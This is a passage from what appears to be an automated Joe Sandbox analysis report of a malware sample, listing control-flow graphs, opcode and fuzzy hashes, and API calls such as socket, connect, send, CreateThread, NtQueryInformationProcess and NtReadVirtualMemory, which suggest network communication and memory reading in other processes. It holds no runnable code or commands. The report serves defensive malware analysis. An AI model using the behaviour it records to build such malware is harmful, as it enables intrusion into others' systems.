                                                                                  • Instruction Fuzzy Hash: A0312275E40219EFCF11DFA8D88AA9DBBF1AB4C320F10452AE510BB280DB399901DF51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 19ea1e9eb447f2f7f4165b2f6cb7c459fa3f0c4ea79f1d62ac818b8b4b01ba1d
                                                                                  • Instruction ID: cc06fdf5c5d4f0a07dac21a25cef102b2b29da79f80271312e0d81df08e0f9f0
                                                                                  • Opcode Fuzzy Hash: 19ea1e9eb447f2f7f4165b2f6cb7c459fa3f0c4ea79f1d62ac818b8b4b01ba1d
                                                                                  • Instruction Fuzzy Hash: 03326774D10369DFEB21CF64C964BE9BBB1BF08354F0440E9D449AB642DB745A84CF92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: ${w7
                                                                                  • API String ID: 0-2374622220
                                                                                  • Opcode ID: 5060eb6a5017b089bf066112f30a83a0de35c2d48b553211482f324f1e181f1c
                                                                                  • Instruction ID: 572ea894133598039776ff97e64c12fa6fdc2fab75802d253dbc2bc95f4924ff
                                                                                  • Opcode Fuzzy Hash: 5060eb6a5017b089bf066112f30a83a0de35c2d48b553211482f324f1e181f1c
                                                                                  • Instruction Fuzzy Hash: 3EB19B71A093819FDB10CF24C884A6BBBE5FF84764F444A6EF9949F290D734E904DB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$Flst
                                                                                  • API String ID: 0-758220159
                                                                                  • Opcode ID: 84988f781ecf0f60067394d4115fe6978117df67fc33eb9434641f9ccf8d4a07
                                                                                  • Instruction ID: 655585fa3e0be944146146ed03782b2aa18ed8944f8d4c41f888292287e52038
                                                                                  • Opcode Fuzzy Hash: 84988f781ecf0f60067394d4115fe6978117df67fc33eb9434641f9ccf8d4a07
                                                                                  • Instruction Fuzzy Hash: AE519CB5A007088FEB14CF95C98475AFBF6EF457A5F54882ED049AF240EB749981CF80
                                                                                  APIs
                                                                                  Strings
                                                                                  • kLsE, xrefs: 376D05FE
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 376D0586
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 3446177414-2547482624
                                                                                  • Opcode ID: 7bd57e0618aca5a2049168e0be113e6449e107273ec5b4d99f16005872c9d765
                                                                                  • Instruction ID: 6f57978ac97acbf7da282773e4f78ec5266d24e7a1f50a7231cdb423dff10bae
                                                                                  • Opcode Fuzzy Hash: 7bd57e0618aca5a2049168e0be113e6449e107273ec5b4d99f16005872c9d765
                                                                                  • Instruction Fuzzy Hash: 8A51E0B5A20B4ADFE710CFB5C5647AAB7F4AF44310F10883ED995D7200EB74A504CBA2
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: 0$0
                                                                                  • API String ID: 3446177414-203156872
                                                                                  • Opcode ID: ae2904e548ffb86377887c3581345aa0af38e0c494c2696096ba646c24600676
                                                                                  • Instruction ID: a766b8dc9927763540cb64d27ea55e8258206a160dd3d23bcda056ca478fab17
                                                                                  • Opcode Fuzzy Hash: ae2904e548ffb86377887c3581345aa0af38e0c494c2696096ba646c24600676
                                                                                  • Instruction Fuzzy Hash: 98416AB16087029FD300CF28C454A5ABBE9FB89354F044A2EF598EB301D775EA05CB96
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: ^l7
                                                                                  • API String ID: 3446177414-3567266305
                                                                                  • Opcode ID: b7f670075ddf609b1f977f742010d4938c1c958b9c62284ef8210c31e5296b43
                                                                                  • Instruction ID: c246c57310db4b6bb29beb2e2dde4acacbb5a4e588d36cb1614f113e739065c1
                                                                                  • Opcode Fuzzy Hash: b7f670075ddf609b1f977f742010d4938c1c958b9c62284ef8210c31e5296b43
                                                                                  • Instruction Fuzzy Hash: 4F419EB9A10202DFDB05CF2AC4945697BF6FF88720B10847AE8099B360DB34E851CBA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: l7$ml7
                                                                                  • API String ID: 3446177414-3629240536
                                                                                  • Opcode ID: c6cbf0c1c44a3676d8ae89e9f93f306bf14f65d99389be751e92c23ee57bc77f
                                                                                  • Instruction ID: e7a1925fc42578db2c32a4482a4041875a6bf8ae6bd95e0f7a16665b1c59850c
                                                                                  • Opcode Fuzzy Hash: c6cbf0c1c44a3676d8ae89e9f93f306bf14f65d99389be751e92c23ee57bc77f
                                                                                  • Instruction Fuzzy Hash: EE11C6B5A01209AFDF11CF98D985ADEBBB9FF4C360F104129F911B7240D735A954CBA1

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.5%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:34
                                                                                  Total number of Limit Nodes:4
                                                                                  execution_graph 4173 694628 4177 694644 4173->4177 4174 6946de 4175 69466b SleepEx 4175->4177 4177->4174 4177->4175 4178 693138 4177->4178 4180 69317d 4178->4180 4179 69321a 4179->4177 4179->4179 4180->4179 4181 693203 SleepEx 4180->4181 4181->4180 4182 69c708 4184 69c745 4182->4184 4183 69c779 closesocket 4184->4183 4204 6939a8 4205 6939bd 4204->4205 4206 693a88 4205->4206 4207 693a5a CreateThread 4205->4207 4185 6939cf 4187 6939f5 4185->4187 4186 693a88 4187->4186 4188 693a5a CreateThread 4187->4188 4189 69c45e 4190 69c4b0 4189->4190 4191 69c4e4 socket 4190->4191 4192 69c59e 4193 69c5ae 4192->4193 4194 69c625 send 4193->4194 4195 69c63c 4194->4195 4196 69c651 4197 69c63c 4196->4197 4198 69c654 4196->4198 4199 69c6d5 connect 4198->4199 4200 69daf4 4201 69db20 4200->4201 4202 69db24 4201->4202 4203 69db60 LdrLoadDll 4201->4203 4203->4202

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID: $
                                                                                  • API String ID: 2422867632-3993045852
                                                                                  • Opcode ID: 6ba2fa942537049f391406450a83df265e82cc50171adb771a302d613cc065ac
                                                                                  • Instruction ID: 5cf5cf066634319678a93d4f9a52d0d6365c1c0fce6b5bf9dc54f931febe7277
                                                                                  • Opcode Fuzzy Hash: 6ba2fa942537049f391406450a83df265e82cc50171adb771a302d613cc065ac
                                                                                  • Instruction Fuzzy Hash: BF11E63120C7444FEF88EF68D48A3A9B7D5FB85324F08057ED489CB292EB769542C746

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 16 693138-693177 17 69317d-693181 16->17 18 69320b-693214 17->18 19 693187-69318a 17->19 18->17 20 69321a-693223 18->20 19->18 21 69318c-693201 call 6a0338 call 6a0308 call 6a0a78 19->21 22 69325c-693279 20->22 23 693225-693229 20->23 21->18 35 693203-693209 SleepEx 21->35 25 69322b-693232 23->25 26 693244-69324d 23->26 28 693238-693242 25->28 26->22 29 69324f-693253 26->29 28->26 28->28 29->22 31 693255-693256 29->31 31->22 35->18
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 4fcb3bbb58052db225a92d78c73de1d6063abf8ea2ccd6a8abda84529cb32855
                                                                                  • Instruction ID: e3cc1c80cbb1e02ce5b3a801b359b925dde995c33e0b76a8fdd8c381b6bc0232
                                                                                  • Opcode Fuzzy Hash: 4fcb3bbb58052db225a92d78c73de1d6063abf8ea2ccd6a8abda84529cb32855
                                                                                  • Instruction Fuzzy Hash: 7131E27151CB588FDF28DF08D8816EA73E5FB85301F40065EE88A87606DB30EA46CBD6

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 36 69c651-69c652 37 69c63c-69c650 36->37 38 69c654-69c6a9 call 6991b8 36->38 41 69c6ab-69c6cf call 69f908 38->41 42 69c6d5-69c6f8 connect 38->42 41->42
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: connect
                                                                                  • String ID:
                                                                                  • API String ID: 1959786783-0
                                                                                  • Opcode ID: 979d2a59bab14fd77f20a66414e983560844dd6cdcf92ae96fd775dd2dced440
                                                                                  • Instruction ID: f5e84925436e07a39b32b3492ff63cbc74a8c95f56c323c993c976611b8c18d5
                                                                                  • Opcode Fuzzy Hash: 979d2a59bab14fd77f20a66414e983560844dd6cdcf92ae96fd775dd2dced440
                                                                                  • Instruction Fuzzy Hash: CB21423090CB088FDF94EF1CA48975977E1FB58310F04056EE85DC735ADA7099458B96

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 45 694628-694667 call 68f308 call 69f908 50 694669 45->50 51 6946de-6946ed 45->51 52 69466b-694680 SleepEx 50->52 53 6946cb-6946d2 52->53 54 694682-694689 52->54 53->52 55 6946d4-6946dc call 6945a8 53->55 54->52 56 69468b-69469c 54->56 55->52 56->52 58 69469e-6946a4 56->58 58->52 60 6946a6-6946a9 58->60 60->52 61 6946ab-6946bc call 69abb8 call 693138 60->61 65 6946c1-6946c9 call 693288 61->65 65->52
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 42cbed4d3c393c331c99c5a85ceac0bd99ce30290078a8cfa166a71a7ccd86db
                                                                                  • Instruction ID: 2628318f882a3a79a117185cd1122f254095c8d1482328750796fbf477787cab
                                                                                  • Opcode Fuzzy Hash: 42cbed4d3c393c331c99c5a85ceac0bd99ce30290078a8cfa166a71a7ccd86db
                                                                                  • Instruction Fuzzy Hash: 22119630614F288FCF95EF288584B6972D6FBC9B00F450A7EE84EC7646CF2489428B46

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 68 69c45e-69c4b8 call 698ff8 71 69c4ba-69c4de call 69f908 68->71 72 69c4e4-69c505 socket 68->72 71->72
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: socket
                                                                                  • String ID:
                                                                                  • API String ID: 98920635-0
                                                                                  • Opcode ID: 6e97e8a9e8d62f078809f3c57f75db5fb70759054e2df11a087fa9a8b6d13824
                                                                                  • Instruction ID: 21ddaaf7372419018706a118d49eb455354a9872404595dd2a0dac5f004b715d
                                                                                  • Opcode Fuzzy Hash: 6e97e8a9e8d62f078809f3c57f75db5fb70759054e2df11a087fa9a8b6d13824
                                                                                  • Instruction Fuzzy Hash: C1114F3091CB488FCB98EF289085756B7E5FB99300F4445BEE88DCB24ADE708944C796

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 75 69c59e-69c5f9 call 699128 79 69c5fb-69c61f call 69f908 75->79 80 69c625-69c636 send 75->80 79->80 82 69c63c-69c650 80->82
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: send
                                                                                  • String ID:
                                                                                  • API String ID: 2809346765-0
                                                                                  • Opcode ID: e4866cdc84c44f62c7a22c2111c9506db465c81c97f00dd7cbe3987f6cce5b86
                                                                                  • Instruction ID: f78bcfcac7f036859a50d8f155db5d9561555540f9bd645a07bda08154bd5233
                                                                                  • Opcode Fuzzy Hash: e4866cdc84c44f62c7a22c2111c9506db465c81c97f00dd7cbe3987f6cce5b86
                                                                                  • Instruction Fuzzy Hash: DB11A23050CA488FCB58EF28D489769BBE1FB98310F0446BEE84EC729ADB709440C796

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 84 6939cf-693a03 86 693a05-693a10 call 6a0168 84->86 87 693a26-693a53 call 68f308 call 69f908 84->87 86->87 93 693a12-693a1c 86->93 95 693a88-693a92 87->95 96 693a55-693a87 call 6a426b CreateThread 87->96 93->87
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: ab6ad6d045aaee73ac8763e60883343574758c535f2f3686d9461b287767a74d
                                                                                  • Instruction ID: 559938230fb88fe12196b909dac532e3f2b0dd0c7a6245f9674c4f23d25883fb
                                                                                  • Opcode Fuzzy Hash: ab6ad6d045aaee73ac8763e60883343574758c535f2f3686d9461b287767a74d
                                                                                  • Instruction Fuzzy Hash: 9A11A130218B044FEB84EF68C889796B3E5FB98315F08067DE449CB252DF799A46CB41

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 99 69daf4-69db22 call 6a0898 102 69db2f-69db3b call 6a3da8 99->102 103 69db24-69db2e 99->103 106 69db49-69db5e call 6a0088 102->106 107 69db3d-69db44 call 6a4078 102->107 111 69db7c-69db84 106->111 112 69db60-69db75 LdrLoadDll 106->112 107->106 112->111
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: d2264aae8a7a59272e80b1de33a92ce51c23d545bcadcd8bada3e69428afb324
                                                                                  • Instruction ID: b10e0caac1635ac0fe9601aa23f17fcb1b17147fe0c69511f5aa202fd2d67ad3
                                                                                  • Opcode Fuzzy Hash: d2264aae8a7a59272e80b1de33a92ce51c23d545bcadcd8bada3e69428afb324
                                                                                  • Instruction Fuzzy Hash: BA01D831208A084BDB54F735C8896ABB3D5FFD8304F04053DA88DC2150EA35DA448B46

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 113 69c708-69c74d call 699248 116 69c779-69c78c closesocket 113->116 117 69c74f-69c773 call 69f908 113->117 117->116
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: closesocket
                                                                                  • String ID:
                                                                                  • API String ID: 2781271927-0
                                                                                  • Opcode ID: c7a860e3fefc1fc3420eac276afe827bf7f73839419f65208696baed3f9dd96a
                                                                                  • Instruction ID: b3355a76cac5f94aeb530c797215def560d9701a6a6aaa214c26cb4ddff9b30e
                                                                                  • Opcode Fuzzy Hash: c7a860e3fefc1fc3420eac276afe827bf7f73839419f65208696baed3f9dd96a
                                                                                  • Instruction Fuzzy Hash: 51011E3051CB489FDB85EF28C0897AAB7F2FBA8301F44067EB88DC7256DB3485448B56

                                                                                  Execution Graph

                                                                                  Execution Coverage:0.5%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:11
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 82692 43c29f0 LdrInitializeThunk 82694 474effa 82695 474f02d 82694->82695 82696 474f1a9 NtQueryInformationProcess 82695->82696 82699 474f21c 82695->82699 82697 474f1e3 82696->82697 82698 474f2c1 NtReadVirtualMemory 82697->82698 82697->82699 82698->82699 82700 43c2b20 82702 43c2b2a 82700->82702 82703 43c2b3f LdrInitializeThunk 82702->82703 82704 43c2b31 82702->82704

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 474effa-474f02b 1 474f02d-474f044 call 4751338 0->1 2 474f049-474f068 call 4751358 call 474d058 0->2 1->2 8 474f06e-474f17a call 474ef38 call 4751358 call 47552c4 call 47403a8 call 4750908 call 47403a8 call 4750908 call 4753028 2->8 9 474f65f-474f66a 2->9 26 474f180-474f21a call 47403a8 call 4750908 NtQueryInformationProcess call 4751358 call 47403a8 call 4750908 8->26 27 474f653-474f65a call 474ef38 8->27 39 474f21c-474f229 26->39 40 474f22e-474f2aa call 47552d2 call 47403a8 call 4750908 26->40 27->9 39->27 40->39 49 474f2b0-474f2bf call 47552fc 40->49 52 474f2c1-474f302 NtReadVirtualMemory call 4752048 49->52 53 474f30c-474f352 call 47403a8 call 4750908 call 4753988 49->53 56 474f307 52->56 62 474f354-474f36c 53->62 63 474f371-474f46d call 47403a8 call 4750908 call 475530a call 47403a8 call 4750908 call 4753348 call 4751308 * 3 call 47552fc 53->63 56->27 62->27 86 474f4a0-474f4b8 call 47552fc 63->86 87 474f46f-474f49e call 47552fc call 4751308 call 475535e call 4755318 63->87 92 474f4e1-474f4f6 call 4751f88 86->92 93 474f4ba-474f4dc call 4752af8 86->93 98 474f4fb-474f505 87->98 92->98 93->92 100 474f5ca-474f633 call 47403a8 call 4750908 call 4753ca8 98->100 101 474f50b-474f55b call 47403a8 call 4750908 call 4753668 call 47552fc 98->101 100->27 126 474f635-474f64e call 4751338 100->126 120 474f590-474f598 call 47552fc 101->120 121 474f55d-474f586 call 47553a8 call 475535e 101->121 120->100 130 474f59a-474f5a5 120->130 121->120 126->27 130->100 132 474f5a7-474f5c5 call 4753fc8 130->132 132->100
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 0474F1C8
                                                                                  • NtReadVirtualMemory.NTDLL ref: 0474F2DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36985469985.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4740000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                  • String ID: 0$Is5(
                                                                                  • API String ID: 1498878907-2799076408
                                                                                  • Opcode ID: b3a70b2416c6de30a22e50daacecbf8430bfc88417f87ee0b7ee7466bab16f26
                                                                                  • Instruction ID: 6215eed2352fb35a5c0cdec1d86f447777344ed59db9f7948a0f9353e85179e4
                                                                                  • Opcode Fuzzy Hash: b3a70b2416c6de30a22e50daacecbf8430bfc88417f87ee0b7ee7466bab16f26
                                                                                  • Instruction Fuzzy Hash: 49025D74518B8C8FDBA5EF28D898AEE77E0FB98304F40461ED84ADB254DF74A641CB41

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 147 43c2c30-43c2c3c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 344de97225c5b9d0762b099dfabb9ad90f069a860cbb1387e2e6aaf6263ed5ce
                                                                                  • Instruction ID: ca90cfe6a3b36399019a5b48139e419e01e138c58bafed367f20c75dcf2f965d
                                                                                  • Opcode Fuzzy Hash: 344de97225c5b9d0762b099dfabb9ad90f069a860cbb1387e2e6aaf6263ed5ce
                                                                                  • Instruction Fuzzy Hash: 7890022E21304002F5847158650860A000587D1246F91F869A0106558CC925E8696321

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 148 43c2cf0-43c2cfc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: ca1a7d117899aa8e8606e59b37238508daca8e7d93ae3ce80689053d850693f2
                                                                                  • Instruction ID: 868712f03aab8259e908625dd6c63528dba43fc061a0e8acfc2c7a3b241dbcd2
                                                                                  • Opcode Fuzzy Hash: ca1a7d117899aa8e8606e59b37238508daca8e7d93ae3ce80689053d850693f2
                                                                                  • Instruction Fuzzy Hash: 77900226243081527949B1585504507400697E0285791E466A1505950CC536F856E621

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 149 43c2d10-43c2d1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 58ed052ad5b84961beec70ee23240c42190b3c6ce3fc6fbd8f0f3576372d4bfa
                                                                                  • Instruction ID: 37a363d96c19b79f4169984aeac4e4c31d6d752ffa159424c6d65b39668ded22
                                                                                  • Opcode Fuzzy Hash: 58ed052ad5b84961beec70ee23240c42190b3c6ce3fc6fbd8f0f3576372d4bfa
                                                                                  • Instruction Fuzzy Hash: A890023620204413F51571585604707000987D0285F91E866A0515558DD666E952B121

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 150 43c2e50-43c2e5c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 52c5f13d53c5d3fa584997743988f2514618a2caf1cba01caa78192a1ce63d31
                                                                                  • Instruction ID: d82dc5d6acf12b9b27a1ebbe89848cc4774cb0ec3d7ba1491b747bc83fc7900c
                                                                                  • Opcode Fuzzy Hash: 52c5f13d53c5d3fa584997743988f2514618a2caf1cba01caa78192a1ce63d31
                                                                                  • Instruction Fuzzy Hash: E590026634204442F50471585514B060005C7E1345F51E469E1155554DC629EC527126
                                                                                  APIs
                                                                                  Memory Dump Source
